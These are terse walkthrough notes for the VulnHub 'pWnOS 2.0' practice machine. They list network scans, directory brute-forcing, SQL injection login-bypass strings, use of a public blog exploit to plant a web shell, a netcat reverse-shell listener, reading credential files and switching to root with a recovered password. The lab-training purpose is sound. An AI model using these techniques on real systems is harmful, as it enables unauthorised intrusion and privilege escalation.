VulnHub: pWnOS: 2.0 (Pre-Release)

nmap -sn 10.10.10.200/24
nmap -Pn 10.10.10.100
nmap -Pn -p1000- 10.10.10.100
nmap -A -p22,80 10.10.10.100
nmap --script vuln -p22,80 10.10.10.100
ssh 10.10.10.100
nikto -h http://10.10.10.100
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.10.100/ -x php,txt,html,sh,cgi,bak -q
1' or 1=1--   -> failed
1' or 1=1-- - -> failed
1' or 1=1--+ -> failed
1' or 1=1# -> succeeded
searchsploit -m 1191
./1191.pl
./1191.pl -h http://10.10.10.100/blog -e 1
http://10.10.10.100/blog/images/cmd.php?cmd=id
rlwrap nc -lvp 443
/var/www
/var
/var/logs
/var/backups
/var/mail
/home/
/opt
/tmp
cd /var/www
ls -la
cat /var/www/mysqli_connect.php
cd /var/
ls -la
cat /var/mysqli_connect.php
su root
password: goodday
su root
password: goodday
whoami
